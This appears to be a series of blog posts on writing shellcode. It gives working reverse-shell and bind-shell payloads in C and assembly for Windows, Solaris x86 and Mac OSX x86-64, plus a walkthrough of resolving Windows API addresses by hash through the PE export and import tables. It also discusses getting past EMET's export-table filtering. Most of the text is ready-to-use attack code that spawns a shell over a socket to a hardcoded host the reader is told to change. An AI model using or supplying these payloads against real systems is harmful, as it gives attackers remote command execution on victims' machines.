    DWORD   cb;              //  +0 or  +0
    LPSTR   lpReserved;      //  +4 or  +8
    LPSTR   lpDesktop;       //  +8 or +16
    LPSTR   lpTitle;         // +12 or +24
    DWORD   dwX;             // +16 or +32
    DWORD   dwY;             // +20 or +36
    DWORD   dwXSize;         // +24 or +40
    DWORD   dwYSize;         // +28 or +44
    DWORD   dwXCountChars;   // +32 or +48
    DWORD   dwYCountChars;   // +36 or +52
    DWORD   dwFillAttribute; // +40 or +56
    DWORD   dwFlags;         // +44 or +60
    WORD    wShowWindow;     // +48 or +64
    WORD    cbReserved2;     // +50 or +66  <-- alignment adds 4 
    LPBYTE  lpReserved2;     // +52 or +72
    HANDLE  hStdInput;       // +56 or +80
    HANDLE  hStdOutput;      // +60 or +88
    HANDLE  hStdError;       // +64 or +96
} STARTUPINFOA, *LPSTARTUPINFOA;

Resolving and executing API

For those of you unfamiliar with this process, please refer to Resolving API addresses in memory.

Although I’ve followed the same idea in this code here where API hashes and additional parameters are accessed through ESI, I may not use this in future. The function to call an API is stored in EBP.

An additional parameter count is stored before the API hash for the x64 dispatcher when pop’ing arguments into RCX, RDX, R8 and R9. We also have to release arguments on the stack after call since Microsoft x64 does not do this but stdcall does.

Here’s what the 32-bit source in x84.asm looks like when working with the PE Export Directory.

x84_asm

Now look at both disassemblies for each mode, first 32-bit which is essentially same as source above.

x32_dis

Then 64-bit

x64_dis

The ‘DEC EAX’ simply turns some opcodes into 64-bit operations when running under 64-bit mode but still works fine under 32-bit mode provided we avoid using EAX as much as possible.

When writing dual mode assembly like this, just imagine EAX doesn’t really exist as a general purpose register and ‘DEC EAX’ is merely an instruction to tell CPU you want the next operation to be 64-bit.

Advancing buffer by 4 or 8 bytes

As you can see from the STARTUPINFO structure above, some data types are 64-bit. When assigning our socket handle to hStdInput, hStdOutput and hStdError, we need to advance the buffer position by 8 bytes.

But in 32-bit mode, we only need to advance 4 so we can of course use conditional jumps for this but instead, we store the socket handle in EBX/RBX, the pointer to memory in EDI/RDI and then use a prefix before SCASD which then adds 4 or 8 depending on CPU mode.

Since we need to avoid using EAX, we can’t use STOSQ which would have DEC EAX prefixed to regular STOSD instruction.

;
    mov    cl, 3
rc_l6x:    
    mov    [edi], ebx  ; si.hStdInput  = s
    dec    eax         ; advance 4 or 8 depending on mode
    scasd
    loop   rc_l6x
//
  /* 01AE */ "\xb1\x03"    /* mov cl, 0x3         */
  /* 01B0 */ "\x89\x1f"    /* mov [rdi], ebx      */
  /* 01B2 */ "\x48\xaf"    /* scasq               */
  /* 01B4 */ "\xe2\xfa"    /* loop 0x1b0          */

The potential problem with this might be if a socket handle returned by WSASocketA occupies more than 32-bits on a 64-bit system.

Reverse shell

So finally here’s a snippet of C code for a simple reverse shell on windows that performs no error checking. Compile this with MSVC or MINGW and use NETCAT or the more advanced NCAT to setup a TCP listener on localhost:1234.

//
  PROCESS_INFORMATION pi;
  STARTUPINFO         si;
  WSADATA             wsa;
  SOCKET              s;
  struct sockaddr_in  sa;
  u_long              ip;
    
  WSAStartup (MAKEWORD(2, 0), &wsa);
  
  s=WSASocket (AF_INET, SOCK_STREAM, 
      IPPROTO_IP, NULL, 0, 0);

  ip = inet_addr ("127.0.0.1"); 
    
  sa.sin_family = AF_INET;
  sa.sin_port   = htons(1234);
  
  memcpy ((void*)&sa.sin_addr, 
      (void*)&ip, sizeof(ip));
    
  connect(s, (struct sockaddr*)&sa, sizeof(sa));

  memset ((void*)&si, 0, sizeof(si));

  si.cb         = sizeof(si);
  si.dwFlags    = STARTF_USESTDHANDLES;
  si.hStdInput  = (HANDLE)s;
  si.hStdOutput = (HANDLE)s;
  si.hStdError  = (HANDLE)s;

  CreateProcess (NULL, "cmd", NULL, NULL, 
    TRUE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi);

  WaitForSingleObject (pi.hProcess, INFINITE);
  
  CloseHandle(pi.hProcess);
  CloseHandle(pi.hThread);
  
  closesocket (s);

Demonstration

You can run a demo using Process Injector tool included.

Here’s a screenshot of Windows NT 4.0 running the bind shell running inside notepad.

bind_nt

And here’s me connecting with ncat.

winnt

Summary

The most difficult part of writing code like this is dealing with the different calling conventions.

An exercise left up to the reader would be writing something that entirely avoids using x64 registers which are used in the x64 dispatcher here.

See source codes here for both bind/reverse shells and any future updates.

Posted in assembly, programming, security, shellcode, windows | Tagged , , , , , | 1 Comment

Shellcode: Solaris x86

Introduction

I wasn’t going to discuss these but they might be useful as a reference for anyone attempting to write shellcodes for Solaris on x86.

Existing x86 codes I found online are outdated and don’t work anymore so these were written from scratch and as of now do work with latest release. If you just want sources, see here.

If you’re writing codes like this from scratch, truss and gdb are both useful to hunt down potential problems. I’ve used yasm to write these sources because AT&T syntax hurts my eyes and brain. It will hurt yours too, take my word for it.

There’s a yasm package available for Solaris through pkg but surprisingly none for nasm.

execve

Most Linux heads will be familiar with execve function. For whatever reason, the copy of Solaris I have just wouldn’t work unless I provided additional null parameter.

int execve(const char *filename, char *const argv[],
           char *const envp[]);
;
    push    0x3b
    pop     eax
    cdq
    push    edx         ; '\0'
    push    '//sh'    	; 
    push    '/bin'    	; 
    mov     ebx, esp    ; ebx = "/bin//sh", 0
    push    edx         ; NULL
    push    ebx         ; "/bin//sh", 0
    mov     ecx, esp    ; ecx = argv
    push    edx         ; 0
    push    edx         ; 0
    push    ecx         ; argv 
    push    ebx         ; "/bin//sh", 0
    push    edx         ; 
    int     0x91

Execute command

Same as first code except we supply “-c” and command in argv[] array.

;
    push    0x3b
    pop     eax         ; eax = sys_execve
    cdq                 ; edx = 0
    push    edx         ; '\0'
    push    '//sh'    	; "hs//"
    push    '/bin'    	; "nib/"
    mov     ebx, esp    ; ebx = "/bin//sh", 0
    push    edx         ; '\0'
    push    word '-c'
    mov     edi, esp
    push    edx         ; NULL
    jmp     l_cmd
r_cmd:
    push    edi         ; "-c", 0    
    push    ebx         ; "/bin//sh", 0
    mov     ecx, esp    ; ecx = argv
    push    edx         ; 0
    push    edx         ; 0
    push    ecx         ; argv 
    push    ebx         ; "/bin//sh", 0
    push    edx         ; 
    int     0x91
l_cmd: 
    call    r_cmd    
    ; put your command here followed by null terminator

Bind shell to port

One thing to mention about binding shell to a port is that dup2 system call for whatever reason isn’t available so we emulate it using close and fcntl

This just listens on port 1234 for incoming connection and spawns /bin/sh

;
    mov    eax, ~0x00000000 & 0xFFFFFFFF
    mov    edx, ~0xD2040002 & 0xFFFFFFFF
    not    eax
    not    edx
    push   eax          ; sa.sin_addr = ADDR_ANY
    push   edx          ; sa.sin_port = 1234, sa.sin_family=AF_INET
    mov    edi, esp     ; edi = &sa
    
    ; step 1
    ; so_socket (AF_INET, SOCK_STREAM, IPPROTO_IP);
    xor    ebx, ebx
    mul    ebx
    mov    al, 2
    push   eax          ; sov_sockstream
    push   edx    
    push   edx          ; IPPROTO_IP
    push   eax          ; SOCK_STREAM
    push   eax          ; AF_INET
    push   eax
    mov    al, 230
    int    0x91

    xchg   eax, ebx
    
    ; step 2
    ; bind (s, &sa, sizeof(sa));
    push   16
    push   edi          ; &sa
    push   ebx          ; s
    push   edx
    mov    al, 232      ; sys_bind         
    int    0x91
    
    ; step 3, listen for incoming connections
    ; listen (s, 0);
    push   edx
    push   ebx          ; s
    push   edx
    mov    al, 233      ; eax=sys_listen
    int    0x91
    
    ; step 4, accept connections
    ; accept (s, 0, 0);
    push   edx          ; 0
    push   ebx          ; s
    push   2            ; 2
    mov    al, 234      ; eax = sys_accept
    int    0x91
    
    ; step 5, assign socket to stdin, stdout and stderr
    ; dup2(r, FILENO_STDIN)
    ; dup2(r, FILENO_STDOUT)
    ; dup2(r, FILENO_STDERR)
    xchg   eax, ebx
    xchg   eax, edx
    cdq
    pop    ecx
    ; dup2 syscall #9 no longer exists
    ; so we emulate it with close() and fcntl()
    ; fildes2 in ecx
    ; fildes in ebx    
    ; edx = 0
dup2:
    ; close(fildes);
    push   ecx
    push   edx
    mov    al, 6
    int    0x91
    ; fid = fcntl(fildes, F_DUPFD, fildes2);
    push   ecx          ; fileno
    push   9            ; F_DUPFD
    push   ebx          ; s
    push   edx          ; return address
    mov    al, 62       ; eax = sys_fcntl
    int    0x91
    add    esp, 6*4
    
    dec    ecx
    jns    dup2
    
    ; step 6
    ; execve ("/bin//sh", {"/bin//sh", NULL}, 0, 0);
    push    edx         ; '\0'
    push    '//sh'
    push    '/bin'
    mov     ebx, esp    ; ebx = "/bin//sh", 0
    push    edx         ; NULL
    push    ebx         ; "/bin//sh", 0
    mov     ecx, esp
    push    edx         ; 0
    push    edx         ; 0
    push    ecx         ; argv
    push    ebx         ; "/bin//sh", 0
    push    edx         
    mov     al, 59      ; eax = sys_execve
    int     0x91

Reverse connect

Setup netcat or ncat locally. Obviously need to change hardcoded ip address and port of 127.0.0.1:1234

;
    mov    eax, ~0x0100007f & 0xFFFFFFFF
    mov    edx, ~0xD2040002 & 0xFFFFFFFF
    not    eax
    not    edx
    push   eax          ; sa.sin_addr = inet_addr("127.0.0.1")
    push   edx          ; sa.sin_port = 1234, sa.sin_family=AF_INET
    mov    edi, esp     ; edi = &sa
    
    ; step 1, create a socket
    ; socket (AF_INET, SOCK_STREAM, IPPROTO_IP);
    xor    ebx, ebx
    mul    ebx
    mov    al, 2
    push   eax          ; sov_sockstream
    push   edx    
    push   edx          ; IPPROTO_IP
    push   eax          ; SOCK_STREAM
    push   eax          ; AF_INET
    push   eax
    mov    al, 230
    int    0x91

    xchg   eax, ebx
    
    ; step 2, assign socket to stdin, stdout and stderr
    ; dup2 (s, FILENO_STDIN)
    ; dup2 (s, FILENO_STDOUT)
    ; dup2 (s, FILENO_STDERR)
    pop    ecx          ; esi = 2 
    ; dup2 syscall #9 no longer seems to exist
    ; so we emulate it with close() and fcntl()
    ; fildes2 in ecx
    ; fildes in ebx    
    ; edx = 0
dup2:
    ; close(fildes);
    push   ecx
    push   edx
    mov    al, 6
    int    0x91
    ; fid = fcntl(fildes, F_DUPFD, fildes2);
    push   ecx          ; fileno
    push   9            ; F_DUPFD
    push   ebx          ; s
    push   edx          ; return address
    mov    al, 62       ; eax = sys_fcntl
    int    0x91
    add    esp, 6*4
    
    dec    ecx
    jns    dup2
    
    ; step 3, connect to remote host
    ; connect (s, {AF_INET, 1234, 127.0.0.1}, 16);
    push   16
    push   edi        ; &sa
    push   ebx        ; s  
    push   eax        ; 0
    mov    al, 235
    int    0x91
    
    ; step 4, execute shell
    ; execvex ("/bin//sh", {"/bin//sh", NULL}, 0, 0);
    push   eax         ; '\0'
    push   '//sh'
    push   '/bin'
    mov    ebx, esp    ; ebx = "/bin//sh", 0
    push   eax         ; NULL
    push   ebx         ; "/bin//sh", 0
    mov    ecx, esp
    push   eax         ; 0  
    push   eax         ; 0  
    push   ecx         ; argv
    push   ebx         ; "/bin//sh", 0
    push   eax         
    mov    al, 59      ; eax = sys_execve
    int    0x91

Sources

See here

Posted in assembly, security, shellcode | Tagged , , , | Leave a comment

Shellcode: Mac OSX x86-64

Introduction

Since Mac OSX is derived from BSD sources, I wrongly presumed the BSD codes would work without problem. 0x4d_ having a Mac was able to confirm they did not work and so we realized quickly the solution was simply setting bit 25 of EAX register using BTS instruction (Bit Test and Set).

;
    bts  eax, 25

You can set alternatively using ROL/ROR/SHL.

Apple does it their way

System calls in OSX follow the AMD64 ABI except for one minor difference. The last 8-bits of EAX register represent the “class” of system call as described by Dustin Schultz in Mac OS X 64 Bit Assembly System Calls.

Mac OS X or likely BSD has split up the system call numbers into several different โ€œclasses.โ€ The upper order bits of the syscall number represent the class of the system call, in the case of write and exit, itโ€™s SYSCALL_CLASS_UNIX and hence the upper order bits are 2! Thus, every Unix system call will be (0ร—2000000 + unix syscall #).

The main difference between system calls on Mac OSX and BSD (which OSX is derived from) is the class. As you can see defined in syscall_sw.h

/*
 * Syscall classes for 64-bit system call entry.
 * For 64-bit users, the 32-bit syscall number is partitioned
 * with the high-order bits representing the class and low-order
 * bits being the syscall number within that class.
 * The high-order 32-bits of the 64-bit syscall number are unused.
 * All system classes enter the kernel via the syscall instruction.
 *
 * These are not #ifdef'd for x86-64 because they might be used for
 * 32-bit someday and so the 64-bit comm page in a 32-bit kernel
 * can use them.
 */
#define SYSCALL_CLASS_SHIFT	24
#define SYSCALL_CLASS_MASK	(0xFF << SYSCALL_CLASS_SHIFT)
#define SYSCALL_NUMBER_MASK	(~SYSCALL_CLASS_MASK)

#define SYSCALL_CLASS_NONE	0	/* Invalid */
#define SYSCALL_CLASS_MACH	1	/* Mach */	
#define SYSCALL_CLASS_UNIX	2	/* Unix/BSD */
#define SYSCALL_CLASS_MDEP	3	/* Machine-dependent */
#define SYSCALL_CLASS_DIAG	4	/* Diagnostics */

So when constructing a system call, they use the following macro defined in same header file.

#define SYSCALL_CONSTRUCT_UNIX(syscall_number) \
    ((SYSCALL_CLASS_UNIX << SYSCALL_CLASS_SHIFT) | \
     (SYSCALL_NUMBER_MASK & (syscall_number)))

Spawn /bin/sh

;
    bits 64

    xor     esi, esi         ; esi = 0
    mul     esi              ; eax = 0, edx = 0
    bts     eax, 25          ; eax = 0x02000000
    mov     al, 59           ; rax = sys_execve
    mov     rbx, '/bin//sh'
    push    rdx              ; 0
    push    rbx              ; "/bin//sh"
    push    rsp
    pop     rdi              ; rdi="/bin//sh", 0
    syscall

Execute command

;
    push    59
    pop     rax         ; eax = sys_execve
    cdq                 ; edx = 0
    bts     eax, 25     ; eax = 0x0200003B
    mov     rbx, '/bin//sh'
    push    rdx         ; 0
    push    rbx         ; "/bin//sh"
    push    rsp
    pop     rdi         ; rdi="/bin//sh", 0
    ; ---------
    push    rdx         ; 0
    push    word '-c'
    push    rsp
    pop     rbx         ; rbx="-c", 0
    push    rdx         ; argv[3]=NULL
    jmp     l_cmd64
r_cmd64:                ; argv[2]=cmd
    push    rbx         ; argv[1]="-c"
    push    rdi         ; argv[0]="/bin//sh"
    push    rsp
    pop     rsi         ; rsi=argv
    syscall
l_cmd64:
    call    r_cmd64
    ; put your command here followed by null terminator

Bind port to shell

;
    mov     rax, ~0x00000000d2040002
    not     rax
    push    rax
    
    xor     ebp, ebp
    bts     ebp, 25
    ; step 1, create a socket
    ; socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    push    rbp
    pop     rax              ; rax = 0x02000000
    cdq                      ; rdx = IPPROTO_IP
    push    1
    pop     rsi              ; rsi = SOCK_STREAM
    push    2
    pop     rdi              ; rdi = AF_INET   
    mov     al, 97           ; eax = sys_socket
    syscall
    
    xchg    eax, edi         ; edi=sockfd
    
    ; step 2, bind to port 1234 
    ; bind(s, {AF_INET,1234,INADDR_ANY}, 16)
    push    rbp
    pop     rax
    push    rsp
    pop     rsi
    mov     dl, 16
    mov     al, 104
    syscall
    
    ; step 3, listen
    ; listen(s, 0);
    push    rax
    pop     rsi
    push    rbp
    pop     rax    
    mov     al, 106
    syscall
    
    ; step 4, accept connections
    ; accept(s, 0, 0);
    push    rbp
    pop     rax    
    mov     al, 30
    cdq
    syscall
    
    xchg    eax, edi         ; edi=r
    push    2
    pop     rsi
    
    ; step 5, assign socket handle to stdin,stdout,stderr
    ; dup2(r, FILENO_STDIN)
    ; dup2(r, FILENO_STDOUT)
    ; dup2(r, FILENO_STDERR)
dup_loop64:
    push    rbp
    pop     rax
    mov     al, 90           ; rax=sys_dup2
    syscall
    dec     esi
    jns     dup_loop64       ; jump if not signed   
    
    ; step 6, execute /bin/sh
    ; execve("/bin//sh", {"/bin//sh", NULL}, 0);
    inc     esi
    cdq                      ; rdx=0
    mov     rbx, '/bin//sh'
    push    rdx              ; 0
    push    rbx              ; "/bin//sh"
    push    rsp
    pop     rdi              ; "/bin//sh", 0
    ; ---------
    push    rbp
    pop     rax    
    mov     al, 59           ; rax=sys_execve
    syscall

Reverse connect shell

;
    mov     rcx, ~0x0100007fd2040200
    not     rcx
    push    rcx
    
    xor     ebp, ebp
    bts     ebp, 25
    ; step 1, create a socket
    ; socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    push    rbp
    pop     rax
    cdq                      ; rdx=IPPROTO_IP
    push    1
    pop     rsi              ; rsi=SOCK_STREAM
    push    2
    pop     rdi              ; rdi=AF_INET  
    mov     al, 97
    syscall
    
    xchg    eax, edi         ; edi=sockfd
    xchg    eax, esi         ; esi=2
    
    ; step 2, assign socket handle to stdin,stdout,stderr
    ; dup2(r, FILENO_STDIN)
    ; dup2(r, FILENO_STDOUT)
    ; dup2(r, FILENO_STDERR)
dup_loop64:
    push    rbp
    pop     rax              ; eax = 0x02000000 
    mov     al, 90           ; rax=sys_dup2
    syscall
    dec     esi
    jns     dup_loop64       ; jump if not signed
    
    ; step 3, connect to remote host
    ; connect (sockfd, {AF_INET,1234,127.0.0.1}, 16);
    push    rbp
    pop     rax
    push    rsp
    pop     rsi
    mov     dl, 16           ; rdx=sizeof(sa)
    mov     al, 98           ; rax=sys_connect
    syscall    
    
    ; step 4, execute /bin/sh
    ; execve("/bin//sh", NULL, 0);
    push    rax
    pop     rsi
    push    rbp
    pop     rax
    cdq                      ; rdx=0
    mov     rbx, '/bin//sh'
    push    rdx              ; 0
    push    rbx              ; "/bin//sh"
    push    rsp
    pop     rdi              ; "/bin//sh", 0
    mov     al, 59           ; rax=sys_execve
    syscall

Sources

See here but bear in mind the x86 code hasn’t been tested.

Thanks to 0x4d_ for helping fix problems with initial codes.

Posted in assembly, osx, security, shellcode | Tagged , , , | Leave a comment

Shellcode: Resolving API addresses in memory

Introduction

A basic but core function of all Position Independent Code (PIC) for windows is to resolve the address of API functions at runtime. It’s an important task with a number of options available. Here, we’ll examine 2 popular methods using the Import Address Table (IAT) and Export Address Table (EAT) which are by far the most stable. (for this kind of code)

Since the release of Windows Vista in 2007, Address space layout randomization (ASLR) is enabled for executables and dynamic link libraries specifically linked to be ASLR-enabled which mitigates exploitation of vulnerabilities.

But even long before ASLR arrived, virus writers over 20 years ago faced a similar problem with the unintentional “randomization” of the base address for kernel32.dll.

The first Windows 95 virus called Bizatch was written by Quantum/VLAD on a beta copy of Windows 95. The virus used hardcoded API and as a result simply crashed on versions of windows that had a different base address for kernel32.dll.

Mr. Sandman, Jacky Qwerty and GriYo discussed “the kernel32 problem” and “the GetModuleHandle solution” in PE infection under Win32 and weren’t aware of the Process Environment Block (PEB) under NT at the time which was discussed later by Ratter in Gaining important datas from PEB under NT boxes..

Jacky Qwerty published a A GetProcAddress-alike utility which initially became a “standard” method of resolving API addressses in viruses.

At some point after this, authors started resolving the API by CRC32 checksum, presumably to hide strings of API in their code and also to reduce space.

LethalMind showed in 1999 a way to resolve API using his own checksum in Retrieving API Addresses. Then of course LSD group proposed in 2002 their own ARX based algorithm in WIN32 Assembly components (shellcodes) which was the basis for many win32 shellcodes that followed.

That’s just a brief (potentially inaccurate) historical context of where most of the basic ideas for resolving API came from. Today of course, there are many more advanced challenges to overcome when exploiting vulnerabilities but they are largely related to protection mechanisms and not what I’ll discuss here.

All the structures displayed here can be found in WinNT.h from the Microsoft SDK which should be included with MSVC if you have it installed.

You can find detailed description of PE/PE+ format in pecoff.docx

Image DOS Header

At the start of every PE file we find an MS-DOS executable or a “stub” that makes any PE file a valid MS-DOS executable.

The only field we need here is e_lfanew which when added to the current base address of module gives us a pointer to NT_IMAGE_HEADERS

// DOS .EXE header
typedef struct _IMAGE_DOS_HEADER {      
    WORD   e_magic;     // Magic number
    WORD   e_cblp;      // Bytes on last page of file
    WORD   e_cp;        // Pages in file
    WORD   e_crlc;      // Relocations
    WORD   e_cparhdr;   // Size of header in paragraphs
    WORD   e_minalloc;  // Minimum extra paragraphs needed
    WORD   e_maxalloc;  // Maximum extra paragraphs needed
    WORD   e_ss;        // Initial (relative) SS value
    WORD   e_sp;        // Initial SP value
    WORD   e_csum;      // Checksum
    WORD   e_ip;        // Initial IP value
    WORD   e_cs;        // Initial (relative) CS value
    WORD   e_lfarlc;    // File address of relocation table
    WORD   e_ovno;      // Overlay number
    WORD   e_res[4];    // Reserved words
    WORD   e_oemid;     // OEM identifier (for e_oeminfo)
    WORD   e_oeminfo;   // OEM information; e_oemid specific
    WORD   e_res2[10];  // Reserved words
    LONG   e_lfanew;    // File address of new exe header
  } IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER;

Image NT Headers

Because the base address for mapped PE image in memory can be “random”, only the Relative Virtual Address (RVA) of important structures are saved in PE file.

To convert a RVA to Virtual Address (VA) we can use the following macro.

#define RVA2VA(type, base, rva) (type)((ULONG_PTR) base + rva)

Once we add e_lfanew to the base address, we then have a pointer to IMAGE_NT_HEADERS.

The following 2 structures are defined in WinNT.h but only one is used depending on architecture C code is compiled for.

We’re interested in the OptionalHeader field which contains among other things information about import and export directories.

typedef struct _IMAGE_NT_HEADERS64 {
    DWORD Signature;
    IMAGE_FILE_HEADER FileHeader;
    IMAGE_OPTIONAL_HEADER64 OptionalHeader;
} IMAGE_NT_HEADERS64, *PIMAGE_NT_HEADERS64;

typedef struct _IMAGE_NT_HEADERS {
    DWORD Signature;
    IMAGE_FILE_HEADER FileHeader;
    IMAGE_OPTIONAL_HEADER32 OptionalHeader;
} IMAGE_NT_HEADERS32, *PIMAGE_NT_HEADERS32;

Image Optional Header

At the end of Optional Header is an array of IMAGE_DATA_DIRECTORY structures.

// Directory Entries

#define IMAGE_DIRECTORY_ENTRY_EXPORT 0   // Export Directory
#define IMAGE_DIRECTORY_ENTRY_IMPORT 1   // Import Directory
//
// Optional header format.
//

typedef struct _IMAGE_OPTIONAL_HEADER {
  //
  // Standard fields.
  //

  WORD    Magic;
  BYTE    MajorLinkerVersion;
  BYTE    MinorLinkerVersion;
  DWORD   SizeOfCode;
  DWORD   SizeOfInitializedData;
  DWORD   SizeOfUninitializedData;
  DWORD   AddressOfEntryPoint;
  DWORD   BaseOfCode;
  DWORD   BaseOfData;

  //
  // NT additional fields.
  //

  DWORD   ImageBase;
  DWORD   SectionAlignment;
  DWORD   FileAlignment;
  WORD    MajorOperatingSystemVersion;
  WORD    MinorOperatingSystemVersion;
  WORD    MajorImageVersion;
  WORD    MinorImageVersion;
  WORD    MajorSubsystemVersion;
  WORD    MinorSubsystemVersion;
  DWORD   Win32VersionValue;
  DWORD   SizeOfImage;
  DWORD   SizeOfHeaders;
  DWORD   CheckSum;
  WORD    Subsystem;
  WORD    DllCharacteristics;
  DWORD   SizeOfStackReserve;
  DWORD   SizeOfStackCommit;
  DWORD   SizeOfHeapReserve;
  DWORD   SizeOfHeapCommit;
  DWORD   LoaderFlags;
  DWORD   NumberOfRvaAndSizes;
IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
} IMAGE_OPTIONAL_HEADER32, *PIMAGE_OPTIONAL_HEADER32;

Image Data Directory

Each directory holds a VA and size of directory. To access the export or import directory, simply add the VirtualAddress to base using RVA2VA macro.

//
// Directory format.
//

typedef struct _IMAGE_DATA_DIRECTORY {
    DWORD   VirtualAddress;
    DWORD   Size;
} IMAGE_DATA_DIRECTORY, *PIMAGE_DATA_DIRECTORY;

#define IMAGE_NUMBEROF_DIRECTORY_ENTRIES    16
  • VirtualAddress
  • RVA of the data structure. For example, if this structure is for import symbols, this field contains the RVA of the IMAGE_IMPORT_DESCRIPTOR array.

  • Size
  • Contains the size in bytes of the data structure referred to by VirtualAddress.

Image Export Directory

Since exports are first in the list of directories, let’s examine this method of retrieval.

//
// Export Format
//

typedef struct _IMAGE_EXPORT_DIRECTORY {
    DWORD   Characteristics;
    DWORD   TimeDateStamp;
    WORD    MajorVersion;
    WORD    MinorVersion;
    DWORD   Name;
    DWORD   Base;
    DWORD   NumberOfFunctions;
    DWORD   NumberOfNames;
    DWORD   AddressOfFunctions;     // RVA from base of image
    DWORD   AddressOfNames;         // RVA from base of image
    DWORD   AddressOfNameOrdinals;  // RVA from base of image
} IMAGE_EXPORT_DIRECTORY, *PIMAGE_EXPORT_DIRECTORY;

We’re interested in 5 fields.

  • Name
  • RVA of a string for DLL name.

  • NumberOfNames
  • The number of exported API by name.

  • AddressOfFunctions
  • RVA to array of RVAs. When each RVA is added to base address of module, they will give us the address of an exported API.

  • AddressOfNames
  • RVA to array of RVAs. When each RVA is added to base address of module, it will give us the address of a null terminated string representing an exported API.

  • AddressOfNameOrdinals
  • RVA to array of ordinals. Each ordinal represents an index in AddressOfFunctions array.

The following function will retrieve an API address from the export table using CRC-32C of DLL and API name.

base parameter is obviously base address of DLL and hash is derived from the addition of 2 CRC-32C hashes. crc32c(DLL string) + crc32c(API string).

LPVOID search_exp(LPVOID base, DWORD hash)
{
  PIMAGE_DOS_HEADER       dos;
  PIMAGE_NT_HEADERS       nt;
  DWORD                   cnt, rva, dll_h;
  PIMAGE_DATA_DIRECTORY   dir;
  PIMAGE_EXPORT_DIRECTORY exp;
  PDWORD                  adr;
  PDWORD                  sym;
  PWORD                   ord;
  PCHAR                   api, dll;
  LPVOID                  api_adr=NULL;
  
  dos = (PIMAGE_DOS_HEADER)base;
  nt  = RVA2VA(PIMAGE_NT_HEADERS, base, dos->e_lfanew);
  dir = (PIMAGE_DATA_DIRECTORY)nt->OptionalHeader.DataDirectory;
  rva = dir[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
  
  // if no export table, return NULL
  if (rva==0) return NULL;
  
  exp = (PIMAGE_EXPORT_DIRECTORY) RVA2VA(ULONG_PTR, base, rva);
  cnt = exp->NumberOfNames;
  
  // if no api, return NULL
  if (cnt==0) return NULL;
  
  adr = RVA2VA(PDWORD,base, exp->AddressOfFunctions);
  sym = RVA2VA(PDWORD,base, exp->AddressOfNames);
  ord = RVA2VA(PWORD, base, exp->AddressOfNameOrdinals);
  dll = RVA2VA(PCHAR, base, exp->Name);
  
  // calculate hash of DLL string
  dll_h = crc32c(dll);
  
  do {
    // calculate hash of api string
    api = RVA2VA(PCHAR, base, sym[cnt-1]);
    // add to DLL hash and compare
    if (crc32c(api) + dll_h == hash) {
      // return address of function
      api_adr = RVA2VA(LPVOID, base, adr[ord[cnt-1]]);
      return api_adr;
    }
  } while (--cnt && api_adr==0);
  return api_adr;
}

One important thing to mention is that this function does not resolve API by ordinal nor does it resolve forward references which can sometimes be a problem.

Here’s some assembly to perform the same thing.

; in:  ebx = base of module to search
;      ecx = hash to find
;
; out: eax = api address resolved in EAT
;
search_expx:
    pushad
    ; eax = IMAGE_DOS_HEADER.e_lfanew
    mov    eax, [ebx+3ch]

    ; first directory is export
    ; ecx = IMAGE_DATA_DIRECTORY.VirtualAddress
    mov    ecx, [ebx+eax+78h]
    jecxz  exp_l2

    ; eax = crc32c(IMAGE_EXPORT_DIRECTORY.Name)
    mov    eax, [ebx+ecx+0ch]
    add    eax, ebx
    call   crc32c
    mov    [esp+_edx], eax

    ; esi = IMAGE_EXPORT_DIRECTORY.NumberOfNames
    lea    esi, [ebx+ecx+18h]
    push   4
    pop    ecx         ; load 4 RVA
exp_l0:
    lodsd              ; load RVA
    add    eax, ebx    ; eax = RVA2VA(ebx, eax)
    push   eax         ; save VA
    loop   exp_l0

    pop    edi          ; edi = AddressOfNameOrdinals
    pop    edx          ; edx = AddressOfNames
    pop    esi          ; esi = AddressOfFunctions
    pop    ecx          ; ecx = NumberOfNames

    sub    ecx, ebx     ; ecx = VA2RVA(NumberOfNames, base)
    jz     exp_l2       ; exit if no api
exp_l3:
    mov    eax, [edx+4*ecx-4] ; get VA of API string
    add    eax, ebx           ; eax = RVA2VA(eax, ebx)
    call   crc32c             ; generate crc32 of api string
    add    eax, [esp+_edx]    ; add crc32 of DLL string

    cmp    eax, [esp+_ecx]    ; found match?
    loopne exp_l3             ; --ecx && eax != hash
    jne    exp_l2             ; exit if not found

    xchg   eax, ebx
    xchg   eax, ecx

    movzx  eax, word [edi+2*eax] ; eax = AddressOfOrdinals[eax]
    add    ecx, [esi+4*eax] ; ecx = base + AddressOfFunctions[eax]
exp_l2:
    mov    [esp+_eax], ecx
    popad
    ret

So that’s the basic method to search through exports. Now for the imports which is a little trickier.

Image Import Descriptor

The release of Enhanced Mitigation Experience Toolkit (EMET) by Microsoft in 2009 broke some existing shellcodes that searched the export directory for API.

EMET includes Export Address Table Access Filtering (EAF) and EAF+ since the release of 5.2, both of which serve to block read attempts of the export and import directories originating from modules commonly used to probe memory during the exploitation of vulnerabilities.

Typically, a shellcode using the IAT will resolve addresses for GetModuleHandle and GetProcAddress before resolving the rest by string.

If a PE file imports API from other modules, the import directory will contain an array of image import descriptors, each one representing a module.

typedef struct _IMAGE_IMPORT_DESCRIPTOR {
  union {
    DWORD Characteristics; // 0 for terminating null import descriptor
    DWORD OriginalFirstThunk; // RVA to original unbound IAT (PIMAGE_THUNK_DATA)
  } DUMMYUNIONNAME;
  DWORD TimeDateStamp;        // 0 if not bound,
                              // -1 if bound, and real date\time stamp
                              //  in IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT (new BIND)
                              // O.W. date/time stamp of DLL bound to (Old BIND)

  DWORD ForwarderChain;       // -1 if no forwarders
  DWORD Name;
  DWORD FirstThunk;           // RVA to IAT (if bound this IAT has actual addresses)
} IMAGE_IMPORT_DESCRIPTOR;
typedef IMAGE_IMPORT_DESCRIPTOR UNALIGNED *PIMAGE_IMPORT_DESCRIPTOR;

The 3 fields we’re interested in are:

  • OriginalFirstThunk
  • Contains offsets to the names of the imported functions.

  • Name
  • Null terminated string of the module to import API from.

  • FirstThunk
  • Contains offsets to the actual addresses of the functions.

Image Thunk Data

Each descriptor contains RVA that points to array of Image Thunk Data structures. Each entry represents information about the imported API.

typedef struct _IMAGE_THUNK_DATA32 {
    union {
        DWORD ForwarderString;      // PBYTE 
        DWORD Function;             // PDWORD
        DWORD Ordinal;
        DWORD AddressOfData;        // PIMAGE_IMPORT_BY_NAME
    } u1;
